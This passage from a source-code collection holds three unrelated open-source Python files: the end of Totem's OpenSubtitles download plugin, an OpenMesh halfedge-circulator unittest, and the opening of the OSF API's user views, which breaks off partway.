(D_('iso_639_3', 'Indonesian'), 'id'),
(D_('iso_639_3', 'Italian'), 'it'),
(D_('iso_639_3', 'Japanese'), 'ja'),
(D_('iso_639_3', 'Kazakh'), 'kk'),
(D_('iso_639_3', 'Korean'), 'ko'),
(D_('iso_639_3', 'Latvian'), 'lv'),
(D_('iso_639_3', 'Lithuanian'), 'lt'),
(D_('iso_639_3', 'Luxembourgish'), 'lb'),
(D_('iso_639_3', 'Macedonian'), 'mk'),
(D_('iso_639_3', 'Malay (macrolanguage)'), 'ms'),
(D_('iso_639_3', 'Norwegian'), 'no'),
(D_('iso_639_3', 'Occitan (post 1500)'), 'oc'),
(D_('iso_639_3', 'Persian'), 'fa'),
(D_('iso_639_3', 'Polish'), 'pl'),
(D_('iso_639_3', 'Portuguese'), 'pt'),
(D_('iso_639_3', 'Romanian'), 'ro'),
(D_('iso_639_3', 'Russian'), 'ru'),
(D_('iso_639_3', 'Serbian'), 'sr'),
(D_('iso_639_3', 'Slovak'), 'sk'),
(D_('iso_639_3', 'Slovenian'), 'sl'),
(D_('iso_639_3', 'Spanish'), 'es'),
(D_('iso_639_3', 'Swedish'), 'sv'),
(D_('iso_639_3', 'Thai'), 'th'),
(D_('iso_639_3', 'Turkish'), 'tr'),
(D_('iso_639_3', 'Ukrainian'), 'uk'),
(D_('iso_639_3', 'Vietnamese'), 'vi'),]
# Map of ISO 639-1 language codes to the codes used by opensubtitles.org's API
LANGUAGES = {'sq':'alb',
'ar':'ara',
'hy':'arm',
'ay':'ass',
'bs':'bos',
'pb':'pob',
'bg':'bul',
'ca':'cat',
'zh':'chi',
'hr':'hrv',
'cs':'cze',
'da':'dan',
'nl':'dut',
'en':'eng',
'eo':'epo',
'eu':'eus',
'et':'est',
'fi':'fin',
'fr':'fre',
'gl':'glg',
'ka':'geo',
'de':'ger',
'el':'ell',
'he':'heb',
'hi':'hin',
'hu':'hun',
'is':'ice',
'id':'ind',
'it':'ita',
'ja':'jpn',
'kk':'kaz',
'ko':'kor',
'lv':'lav',
'lt':'lit',
'lb':'ltz',
'mk':'mac',
'ms':'may',
'no':'nor',
'oc':'oci',
'fa':'per',
'pl':'pol',
'pt':'por',
'ro':'rum',
'ru':'rus',
'sr':'scc',
'sk':'slo',
'sl':'slv',
'es':'spa',
'sv':'swe',
'th':'tha',
'tr':'tur',
'uk':'ukr',
'vi':'vie',}
class SearchThread (threading.Thread):
"""
This is the thread started when the dialog is searching for subtitles
"""
def __init__ (self, model, movie_hash, movie_size):
self._model = model
self._movie_hash = movie_hash
self._movie_size = movie_size
self._done = False
self._results = []
self._lock = threading.Lock ()
self._message = ''
threading.Thread.__init__ (self)
def run (self):
self._lock.acquire (True)
(self._results,
self._message) = self._model.search_subtitles (self._movie_hash,
self._movie_size)
self._done = True
self._lock.release ()
def get_results (self):
results = []
self._lock.acquire (True)
if self._done:
results = self._results
self._lock.release ()
return results
def get_message (self):
message = _(u'Searching for subtitles…')
self._lock.acquire (True)
if self._done:
message = self._message
self._lock.release ()
return message
@property
def done (self):
""" Thread-safe property to know whether the query is done or not """
self._lock.acquire (True)
res = self._done
self._lock.release ()
return res
class DownloadThread (threading.Thread):
"""
This is the thread started when the dialog is downloading the subtitles.
"""
def __init__ (self, model, subtitle_id):
self._model = model
self._subtitle_id = subtitle_id
self._done = False
self._lock = threading.Lock ()
self._subtitles = ''
self._message = ''
threading.Thread.__init__ (self)
def run (self):
self._lock.acquire (True)
(self._subtitles,
self._message) = self._model.download_subtitles (self._subtitle_id)
self._done = True
self._lock.release ()
def get_subtitles (self):
subtitles = ''
self._lock.acquire (True)
if self._done:
subtitles = self._subtitles
self._lock.release ()
return subtitles
def get_message (self):
message = _(u'Downloading the subtitles…')
self._lock.acquire (True)
if self._done:
message = self._message
self._lock.release ()
return message
@property
def done (self):
""" Thread-safe property to know whether the query is done or not """
self._lock.acquire (True)
res = self._done
self._lock.release ()
return res
# OpenSubtitles.org API abstraction
class OpenSubtitlesModel (object):
"""
This contains the logic of the opensubtitles service.
"""
def __init__ (self, server):
self._server = server
self._token = None
try:
import locale
(language_code, _) = locale.getlocale ()
self.lang = LANGUAGES[language_code.split ('_')[0]]
except (ImportError, IndexError, AttributeError, KeyError):
self.lang = 'eng'
self._lock = threading.Lock ()
def _log_in (self, username='', password=''):
"""
Non-locked version of log_in() for internal use only.
@rtype : (bool, string)
"""
result = None
if self._token:
# We have already logged-in before, check the connection
try:
result = self._server.NoOperation (self._token)
except (xmlrpc.client.Fault, xmlrpc.client.ProtocolError):
pass
if result and result['status'] != OK200:
return (True, '')
try:
result = self._server.LogIn (username, password, self.lang,
USER_AGENT)
except (xmlrpc.client.Fault, xmlrpc.client.ProtocolError):
pass
if result and result.get ('status') == OK200:
self._token = result.get ('token')
if self._token:
return (True, '')
return (False, _(u'Could not contact the OpenSubtitles website'))
def log_in (self, username='', password=''):
"""
Logs into the opensubtitles web service and gets a valid token for
the comming comunications. If we are already logged it only checks
the if the token is still valid. It returns a tuple of success boolean
and error message (if appropriate).
@rtype : (bool, string)
"""
self._lock.acquire (True)
result = self._log_in (username, password)
self._lock.release ()
return result
def search_subtitles (self, movie_hash, movie_size):
self._lock.acquire (True)
message = ''
(log_in_success, log_in_message) = self._log_in ()
if log_in_success:
searchdata = {'sublanguageid': self.lang,
'moviehash' : movie_hash,
'moviebytesize': str (movie_size)}
try:
result = self._server.SearchSubtitles (self._token,
[searchdata])
except xmlrpc.client.ProtocolError:
message = _(u'Could not contact the OpenSubtitles website.')
if result.get ('data'):
self._lock.release ()
return (result['data'], message)
else:
message = _(u'No results found.')
else:
message = log_in_message
self._lock.release ()
return (None, message)
def download_subtitles (self, subtitle_id):
self._lock.acquire (True)
message = ''
error_message = _(u'Could not contact the OpenSubtitles website.')
(log_in_success, log_in_message) = self._log_in ()
if log_in_success:
result = None
try:
result = self._server.DownloadSubtitles (self._token,
[subtitle_id])
except xmlrpc.client.ProtocolError:
message = error_message
if result and result.get ('status') == OK200:
try:
subtitle64 = result['data'][0]['data']
except LookupError:
self._lock.release ()
return (None, error_message)
subtitle_unzipped = zlib.decompress(GLib.base64_decode (subtitle64), 47)
self._lock.release ()
return (subtitle_unzipped, message)
else:
message = log_in_message
self._lock.release ()
return (None, message)
class OpenSubtitles (GObject.Object, # pylint: disable-msg=R0902
Peas.Activatable):
__gtype_name__ = 'OpenSubtitles'
object = GObject.Property (type = GObject.Object)
def __init__ (self):
GObject.Object.__init__ (self)
self._dialog = None
self._totem = None
schema = 'org.gnome.totem.plugins.opensubtitles'
self._settings = Gio.Settings.new (schema)
self._action = None
self._find_button = None
self._apply_button = None
self._close_button = None
self._list_store = None
self._model = None
self._tree_view = None
self._filename = None
self._progress = None
# totem.Plugin methods
def do_activate (self):
"""
Called when the plugin is activated.
Here the sidebar page is initialized (set up the treeview, connect
the callbacks, ...) and added to totem.
"""
self._totem = self.object
# Name of the movie file which the most-recently-downloaded subtitles
# are related to.
self._filename = None
self._append_menu ()
self._totem.connect ('file-opened', self.__on_totem__file_opened)
self._totem.connect ('file-closed', self.__on_totem__file_closed)
# Obtain the ServerProxy and init the model
server = xmlrpc.client.Server ('http://api.opensubtitles.org/xml-rpc')
self._model = OpenSubtitlesModel (server)
def do_deactivate (self):
if self._dialog:
self._dialog.destroy ()
self._dialog = None
self._delete_menu ()
# UI related code
def _build_dialog (self):
builder = Totem.plugin_load_interface ("opensubtitles",
"opensubtitles.ui", True,
self._totem.get_main_window (),
None)
# Obtain all the widgets we need to initialize
combobox = builder.get_object ('language_combobox')
languages = builder.get_object ('language_model')
self._progress = builder.get_object ('progress_bar')
self._tree_view = builder.get_object ('subtitle_treeview')
self._list_store = builder.get_object ('subtitle_model')
self._dialog = builder.get_object ('subtitles_dialog')
self._find_button = builder.get_object ('find_button')
self._apply_button = builder.get_object ('apply_button')
self._close_button = builder.get_object ('close_button')
# Set up and populate the languages combobox
renderer = Gtk.CellRendererText ()
sorted_languages = Gtk.TreeModelSort (model = languages)
sorted_languages.set_sort_column_id (0, Gtk.SortType.ASCENDING)
combobox.set_model (sorted_languages)
combobox.pack_start (renderer, True)
combobox.add_attribute (renderer, 'text', 0)
lang = self._settings.get_string ('language')
if lang is not None:
self._model.lang = lang
for lang in LANGUAGES_STR:
itera = languages.append (lang)
if LANGUAGES[lang[1]] == self._model.lang:
(success,
parentit) = sorted_languages.convert_child_iter_to_iter (itera)
if success:
combobox.set_active_iter (parentit)
# Set up the results treeview
renderer = Gtk.CellRendererText ()
self._tree_view.set_model (self._list_store)
renderer.set_property ('ellipsize', Pango.EllipsizeMode.END)
column = Gtk.TreeViewColumn (_(u"Subtitles"), renderer, text=0)
column.set_resizable (True)
column.set_expand (True)
self._tree_view.append_column (column)
# translators comment:
# This is the file-type of the subtitle file detected
column = Gtk.TreeViewColumn (_(u"Format"), renderer, text=1)
column.set_resizable (False)
self._tree_view.append_column (column)
# translators comment:
# This is a rating of the quality of the subtitle
column = Gtk.TreeViewColumn (_(u"Rating"), renderer, text=2)
column.set_resizable (False)
self._tree_view.append_column (column)
self._apply_button.set_sensitive (False)
self._apply_button.connect ('clicked', self.__on_apply_clicked)
self._find_button.connect ('clicked', self.__on_find_clicked)
self._close_button.connect ('clicked', self.__on_close_clicked)
# Set up signals
combobox.connect ('changed', self.__on_combobox__changed)
self._dialog.connect ('delete-event', self._dialog.hide_on_delete)
self._dialog.set_transient_for (self._totem.get_main_window ())
self._dialog.set_position (Gtk.WindowPosition.CENTER_ON_PARENT)
# Connect the callbacks
self._dialog.connect ('key-press-event',
self.__on_window__key_press_event)
self._tree_view.get_selection ().connect ('changed',
self.__on_treeview__row_change)
self._tree_view.connect ('row-activated',
self.__on_treeview__row_activate)
def _show_dialog (self, params, _):
if not self._dialog:
self._build_dialog ()
self._dialog.show_all ()
self._progress.set_fraction (0.0)
def _append_menu (self):
self._action = Gio.SimpleAction.new ("opensubtitles", None)
self._action.connect ('activate', self._show_dialog)
self._totem.add_action (self._action)
self._totem.set_accels_for_action ("app.opensubtitles",
["<Primary><Shift>s"])
menu = self._totem.get_menu_section ("subtitle-download-placeholder")
menu.append (_(u'_Download Movie Subtitles…'), "app.opensubtitles")
self._action.set_enabled (self._totem.is_playing () and
self._check_allowed_scheme () and
not self._check_is_audio ())
def _check_allowed_scheme (self):
current_file = Gio.file_new_for_uri (self._totem.get_current_mrl ())
scheme = current_file.get_uri_scheme ()
if (scheme == 'dvd' or scheme == 'http' or
scheme == 'dvb' or scheme == 'vcd'):
return False
return True
def _check_is_audio (self):
# FIXME need to use something else here
# I think we must use video widget metadata but I don't found a way
# to get this info from python
filename = self._totem.get_current_mrl ()
if Gio.content_type_guess (filename, '')[0].split ('/')[0] == 'audio':
return True
return False
def _delete_menu (self):
self._totem.empty_menu_section ("subtitle-download-placeholder")
def _get_results (self, movie_hash, movie_size):
self._list_store.clear ()
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
cursor = Gdk.Cursor.new (Gdk.CursorType.WATCH)
self._dialog.get_window ().set_cursor (cursor)
thread = SearchThread (self._model, movie_hash, movie_size)
thread.start ()
GLib.idle_add (self._populate_treeview, thread)
self._progress.set_text (_(u'Searching subtitles…'))
GLib.timeout_add (350, self._progress_bar_increment, thread)
def _populate_treeview (self, search_thread):
if not search_thread.done:
return True
results = search_thread.get_results ()
if results:
for sub_data in results:
if not SUBTITLES_EXT.count (sub_data['SubFormat']):
continue
self._list_store.append ([sub_data['SubFileName'],
sub_data['SubFormat'],
sub_data['SubRating'],
sub_data['IDSubtitleFile'],])
self._dialog.get_window ().set_cursor (None)
return False
def _save_selected_subtitle (self):
cursor = Gdk.Cursor.new (Gdk.CursorType.WATCH)
self._dialog.get_window ().set_cursor (cursor)
model, rows = self._tree_view.get_selection ().get_selected_rows ()
if rows:
subtitle_iter = model.get_iter (rows[0])
subtitle_id = model.get_value (subtitle_iter, 3)
subtitle_format = model.get_value (subtitle_iter, 1)
bpath = self._cache_subtitles_dir()
directory = Gio.file_new_for_path (bpath)
try:
directory.make_directory_with_parents (None);
except:
pass
thread = DownloadThread (self._model, subtitle_id)
thread.start ()
GLib.idle_add (self._save_subtitles, thread, subtitle_format)
self._progress.set_text (_(u'Downloading the subtitles…'))
GLib.timeout_add (350, self._progress_bar_increment, thread)
else:
#warn user!
pass
def _cache_subtitles_dir (self):
bpath = GLib.get_user_cache_dir() + sep
bpath += 'totem' + sep + 'subtitles' + sep
return bpath
def _movie_dir (self):
directory = Gio.file_new_for_uri (self._filename)
parent = directory.get_parent()
return parent.get_path ()
def _save_subtitles (self, download_thread, extension):
if not download_thread.done:
return True
subtitles = download_thread.get_subtitles ()
suburi = None
if subtitles:
subtitle_file = Gio.file_new_for_uri (self._filename)
movie_name = subtitle_file.get_basename ().rpartition ('.')[0]
# Delete all previous cached subtitle for this file
for ext in SUBTITLES_EXT:
# In the cache dir
old_subtitle_file = Gio.file_new_for_path (self._cache_subtitles_dir() + sep + movie_name + '.' + ext)
try:
old_subtitle_file.delete (None)
except:
pass
# In the movie dir
old_subtitle_file = Gio.file_new_for_path (self._movie_dir() + sep + movie_name + '.' + ext)
try:
old_subtitle_file.delete (None)
except:
pass
flags = Gio.FileCreateFlags.REPLACE_DESTINATION
try:
subtitle_file = Gio.file_new_for_path (self._movie_dir() + sep + movie_name + '.' + extension)
print ('trying to save to ' + subtitle_file.get_uri())
suburi = subtitle_file.get_uri ()
sub_file = subtitle_file.replace ('', False, flags, None)
sub_file.write (subtitles, None)
sub_file.close (None)
except:
subtitle_file = Gio.file_new_for_path (self._cache_subtitles_dir() + sep + movie_name + '.' + extension)
print ('saving to ' + subtitle_file.get_uri())
suburi = subtitle_file.get_uri ()
sub_file = subtitle_file.replace ('', False, flags, None)
sub_file.write (subtitles, None)
sub_file.close (None)
self._dialog.get_window ().set_cursor (None)
self._close_dialog ()
if suburi:
self._totem.set_current_subtitle (suburi)
return False
def _progress_bar_increment (self, thread):
if not thread.done:
self._progress.pulse ()
return True
message = thread.get_message ()
if message:
self._progress.set_text (message)
else:
self._progress.set_text (' ')
self._progress.set_fraction (0.0)
self._find_button.set_sensitive (True)
self._apply_button.set_sensitive (False)
self._tree_view.set_sensitive (True)
return False
def _download_and_apply (self):
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
self._action.set_enabled (False)
self._tree_view.set_sensitive (False)
self._save_selected_subtitle ()
def _close_dialog (self):
# We hide the dialogue instead of closing it so that we still have the
# last set of search results up if we re-open the dialogue without
# changing the movie
self._dialog.hide ()
# Callbacks
def __on_window__key_press_event (self, _, event):
if event.keyval == Gdk.KEY_Escape:
self._close_dialog ()
return True
return False
def __on_treeview__row_change (self, selection):
if selection.count_selected_rows () > 0:
self._apply_button.set_sensitive (True)
else:
self._apply_button.set_sensitive (False)
def __on_treeview__row_activate (self,
_tree_path, # pylint: disable-msg=W0613
_column, # pylint: disable-msg=W0613
_data): # pylint: disable-msg=W0613
self._download_and_apply ()
def __on_totem__file_opened (self, _, new_mrl):
# Check if allows subtitles
if self._check_allowed_scheme () and not self._check_is_audio ():
self._action.set_enabled (True)
if self._dialog:
self._find_button.set_sensitive (True)
# Check we're not re-opening the same file; if we are, don't
# clear anything. This happens when we re-load the file with a
# new set of subtitles, for example
if self._filename != new_mrl:
self._filename = new_mrl
self._list_store.clear ()
self._apply_button.set_sensitive (False)
else:
self._action.set_enabled (False)
if self._dialog and self._dialog.is_active ():
self._filename = None
self._list_store.clear ()
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
def __on_totem__file_closed (self, _):
self._action.set_enabled (False)
if self._dialog:
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
def __on_combobox__changed (self, combobox):
combo_iter = combobox.get_active_iter ()
combo_model = combobox.get_model ()
self._model.lang = LANGUAGES[combo_model.get_value (combo_iter, 1)]
self._settings.set_string ('language', self._model.lang)
def __on_close_clicked (self, _):
self._close_dialog ()
def __on_apply_clicked (self, _):
self._download_and_apply ()
def __on_find_clicked (self, _):
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
self._filename = self._totem.get_current_mrl ()
(movie_hash, movie_size) = hash_file (self._filename)
self._get_results (movie_hash, movie_size)
|
ndufresne/totem
|
src/plugins/opensubtitles/opensubtitles.py
|
Python
|
gpl-2.0
| 26,489
|
import unittest
import openmesh
class TriMeshCirculatorVertexIHalfEdge(unittest.TestCase):
def setUp(self):
self.mesh = openmesh.TriMesh()
# Add some vertices
self.vhandle = []
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0,-1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2,-1, 0)))
# Add four faces
self.mesh.add_face(self.vhandle[0], self.vhandle[1], self.vhandle[2])
self.mesh.add_face(self.vhandle[1], self.vhandle[3], self.vhandle[4])
self.mesh.add_face(self.vhandle[0], self.vhandle[3], self.vhandle[1])
self.mesh.add_face(self.vhandle[2], self.vhandle[1], self.vhandle[4])
'''
Test setup:
0 ==== 2
|\ 0 /|
| \ / |
|2 1 3|
| / \ |
|/ 1 \|
3 ==== 4
Starting halfedge is 1->4
'''
def test_vertex_incoming_halfedge_without_holes_increment(self):
# Iterate around vertex 1 at the middle
vih_it = openmesh.VertexIHalfedgeIter(self.mesh, self.vhandle[1])
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 10)
self.assertEqual(self.mesh.face_handle(heh).idx(), 1)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 7)
self.assertEqual(self.mesh.face_handle(heh).idx(), 2)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 0)
self.assertEqual(self.mesh.face_handle(heh).idx(), 0)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 3)
self.assertEqual(self.mesh.face_handle(heh).idx(), 3)
self.assertRaises(StopIteration, vih_it.__next__)
def test_vertex_incoming_halfedge_boundary_increment(self):
# Iterate around vertex 2 at the boundary
vih_it = openmesh.VertexIHalfedgeIter(self.mesh, self.vhandle[2])
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 14)
self.assertEqual(self.mesh.face_handle(heh).idx(), 3)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 2)
self.assertEqual(self.mesh.face_handle(heh).idx(), 0)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 5)
self.assertEqual(self.mesh.face_handle(heh).idx(), -1)
self.assertRaises(StopIteration, vih_it.__next__)
def test_vertex_incoming_halfedge_dereference_increment(self):
# Iterate around vertex 1 at the middle
vih_it = openmesh.VertexIHalfedgeIter(self.mesh, self.vhandle[1])
heh = vih_it.__next__()
eh = self.mesh.edge_handle(heh)
vh = self.mesh.to_vertex_handle(heh)
self.assertEqual(heh.idx(), 10)
self.assertEqual(eh.idx(), 5)
self.assertEqual(vh.idx(), 1)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TriMeshCirculatorVertexIHalfEdge)
unittest.TextTestRunner(verbosity=2).run(suite)
|
svn2github/OpenMesh2
|
src/Python/Unittests/test_trimesh_circulator_vertex_ihalfedge.py
|
Python
|
bsd-3-clause
| 3,197
|
import pytz
from django.apps import apps
from django.db.models import F, Q
from api.addons.views import AddonSettingsMixin
from api.base import permissions as base_permissions
from api.base.waffle_decorators import require_flag
from api.base.exceptions import Conflict, UserGone
from api.base.filters import ListFilterMixin, PreprintFilterMixin
from api.base.parsers import (
JSONAPIRelationshipParser,
JSONAPIRelationshipParserForRegularJSON,
JSONAPIMultipleRelationshipsParser,
JSONAPIMultipleRelationshipsParserForRegularJSON,
)
from api.base.serializers import get_meta_type, AddonAccountSerializer
from api.base.utils import (
default_node_list_permission_queryset,
get_object_or_error,
get_user_auth,
hashids,
is_truthy,
)
from api.base.views import JSONAPIBaseView, WaterButlerMixin
from api.base.throttling import SendEmailThrottle, SendEmailDeactivationThrottle
from api.institutions.serializers import InstitutionSerializer
from api.nodes.filters import NodesFilterMixin, UserNodesFilterMixin
from api.nodes.serializers import DraftRegistrationSerializer
from api.nodes.utils import NodeOptimizationMixin
from api.osf_groups.serializers import GroupSerializer
from api.preprints.serializers import PreprintSerializer
from api.registrations.serializers import RegistrationSerializer
from api.users.permissions import (
CurrentUser, ReadOnlyOrCurrentUser,
ReadOnlyOrCurrentUserRelationship,
ClaimUserPermission,
)
from api.users.serializers import (
UserAddonSettingsSerializer,
UserDetailSerializer,
UserIdentitiesSerializer,
UserInstitutionsRelationshipSerializer,
UserSerializer,
UserEmail,
UserEmailsSerializer,
UserNodeSerializer,
UserSettingsSerializer,
UserSettingsUpdateSerializer,
UserQuickFilesSerializer,
UserAccountExportSerializer,
ReadEmailUserDetailSerializer,
UserChangePasswordSerializer,
)
from django.contrib.auth.models import AnonymousUser
from django.http import JsonResponse
from django.utils import timezone
from framework.auth.core import get_user
from framework.auth.views import send_confirm_email
from framework.auth.oauth_scopes import CoreScopes, normalize_scopes
from framework.auth.exceptions import ChangePasswordError
from framework.utils import throttle_period_expired
from framework.sessions.utils import remove_sessions_for_user
from framework.exceptions import PermissionsError, HTTPError
from osf.features import OSF_GROUPS
from rest_framework import permissions as drf_permissions
from rest_framework import generics
from rest_framework import status
from rest_framework.response import Response
from rest_framework.exceptions import NotAuthenticated, NotFound, ValidationError, Throttled
from osf.models import (
Contributor,
DraftRegistration,
ExternalAccount,
Guid,
QuickFilesNode,
AbstractNode,
Preprint,
Node,
Registration,
OSFGroup,
OSFUser,
Email,
)
from osf.utils import permissions
from website import mails, settings
from website.project.views.contributor import send_claim_email, send_claim_registered_email
class UserMixin(object):
"""Mixin with convenience methods for retrieving the current user based on the
current URL. By default, fetches the user based on the user_id kwarg.
"""
serializer_class = UserSerializer
user_lookup_url_kwarg = 'user_id'
def get_user(self, check_permissions=True):
key = self.kwargs[self.user_lookup_url_kwarg]
# If Contributor is in self.request.parents,
# then this view is getting called due to an embedded request (contributor embedding user)
# We prefer to access the user from the contributor object and take advantage
# of the query cache
if hasattr(self.request, 'parents') and len(self.request.parents.get(Contributor, {})) == 1:
# We expect one parent contributor view, so index into the first item
contrib_id, contrib = self.request.parents[Contributor].items()[0]
user = contrib.user
if user.is_disabled:
raise UserGone(user=user)
# Make sure that the contributor ID is correct
if user._id == key:
if check_permissions:
self.check_object_permissions(self.request, user)
return get_object_or_error(
OSFUser.objects.filter(id=user.id).annotate(default_region=F('addons_osfstorage_user_settings__default_region___id')).exclude(default_region=None),
request=self.request,
display_name='user',
)
if self.kwargs.get('is_embedded') is True:
if key in self.request.parents[OSFUser]:
return self.request.parents[OSFUser].get(key)
current_user = self.request.user
if isinstance(current_user, AnonymousUser):
if key == 'me':
raise NotAuthenticated
elif key == 'me' or key == current_user._id:
return get_object_or_error(
OSFUser.objects.filter(id=current_user.id).annotate(default_region=F('addons_osfstorage_user_settings__default_region___id')).exclude(default_region=None),
request=self.request,
display_name='user',
)
obj = get_object_or_error(OSFUser, key, self.request, 'user')
if check_permissions:
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
class UserList(JSONAPIBaseView, generics.ListAPIView, ListFilterMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.RequiresScopedRequestOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.NULL]
model_class = apps.get_model('osf.OSFUser')
serializer_class = UserSerializer
ordering = ('-date_registered')
view_category = 'users'
view_name = 'user-list'
def get_default_queryset(self):
if self.request.version >= '2.3':
return OSFUser.objects.filter(is_registered=True, date_disabled__isnull=True, merged_by__isnull=True)
return OSFUser.objects.filter(is_registered=True, date_disabled__isnull=True)
# overrides ListCreateAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserDetail(JSONAPIBaseView, generics.RetrieveUpdateAPIView, UserMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_read).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
ReadOnlyOrCurrentUser,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE]
view_category = 'users'
view_name = 'user-detail'
serializer_class = UserDetailSerializer
parser_classes = (JSONAPIMultipleRelationshipsParser, JSONAPIMultipleRelationshipsParserForRegularJSON,)
def get_serializer_class(self):
if self.request.auth:
scopes = self.request.auth.attributes['accessTokenScope']
if (CoreScopes.USER_EMAIL_READ in normalize_scopes(scopes) and self.request.user == self.get_user()):
return ReadEmailUserDetailSerializer
return UserDetailSerializer
# overrides RetrieveAPIView
def get_object(self):
return self.get_user()
# overrides RetrieveUpdateAPIView
def get_serializer_context(self):
# Serializer needs the request in order to make an update to privacy
context = JSONAPIBaseView.get_serializer_context(self)
context['request'] = self.request
return context
class UserAddonList(JSONAPIBaseView, generics.ListAPIView, ListFilterMixin, UserMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_addons_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = UserAddonSettingsSerializer
view_category = 'users'
view_name = 'user-addons'
ordering = ('-id',)
def get_queryset(self):
qs = [addon for addon in self.get_user().get_addons() if 'accounts' in addon.config.configs]
qs.sort()
return qs
class UserAddonDetail(JSONAPIBaseView, generics.RetrieveAPIView, UserMixin, AddonSettingsMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_addons_read).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = UserAddonSettingsSerializer
view_category = 'users'
view_name = 'user-addon-detail'
def get_object(self):
return self.get_addon_settings(check_object_permissions=False)
class UserAddonAccountList(JSONAPIBaseView, generics.ListAPIView, UserMixin, AddonSettingsMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/Users_addon_accounts_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = AddonAccountSerializer
view_category = 'users'
view_name = 'user-external_accounts'
ordering = ('-date_last_refreshed',)
def get_queryset(self):
return self.get_addon_settings(check_object_permissions=False).external_accounts
class UserAddonAccountDetail(JSONAPIBaseView, generics.RetrieveAPIView, UserMixin, AddonSettingsMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/Users_addon_accounts_read).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = AddonAccountSerializer
view_category = 'users'
view_name = 'user-external_account-detail'
def get_object(self):
user_settings = self.get_addon_settings(check_object_permissions=False)
account_id = self.kwargs['account_id']
account = ExternalAccount.load(account_id)
if not (account and user_settings.external_accounts.filter(id=account.id).exists()):
raise NotFound('Requested addon unavailable')
return account
class UserNodes(JSONAPIBaseView, generics.ListAPIView, UserMixin, UserNodesFilterMixin, NodeOptimizationMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_nodes_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
model_class = AbstractNode
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_BASE_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_BASE_WRITE]
serializer_class = UserNodeSerializer
view_category = 'users'
view_name = 'user-nodes'
ordering = ('-last_logged',)
# overrides NodesFilterMixin
def get_default_queryset(self):
user = self.get_user()
# Nodes the requested user has read_permissions on
default_queryset = user.nodes_contributor_or_group_member_to
if user != self.request.user:
# Further restrict UserNodes to nodes the *requesting* user can view
return Node.objects.get_nodes_for_user(self.request.user, base_queryset=default_queryset, include_public=True)
return self.optimize_node_queryset(default_queryset)
# overrides ListAPIView
def get_queryset(self):
return (
self.get_queryset_from_request()
.select_related('node_license')
.include('contributor__user__guids', 'root__guids', limit_includes=10)
)
class UserGroups(JSONAPIBaseView, generics.ListAPIView, UserMixin, ListFilterMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.OSF_GROUPS_READ]
required_write_scopes = [CoreScopes.NULL]
model_class = apps.get_model('osf.OSFGroup')
serializer_class = GroupSerializer
view_category = 'users'
view_name = 'user-groups'
ordering = ('-modified', )
@require_flag(OSF_GROUPS)
def get_default_queryset(self):
requested_user = self.get_user()
current_user = self.request.user
if current_user.is_anonymous:
return OSFGroup.objects.none()
return requested_user.osf_groups.filter(id__in=current_user.osf_groups.values_list('id', flat=True))
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserQuickFiles(JSONAPIBaseView, generics.ListAPIView, WaterButlerMixin, UserMixin, ListFilterMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
ordering = ('-last_touched')
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE]
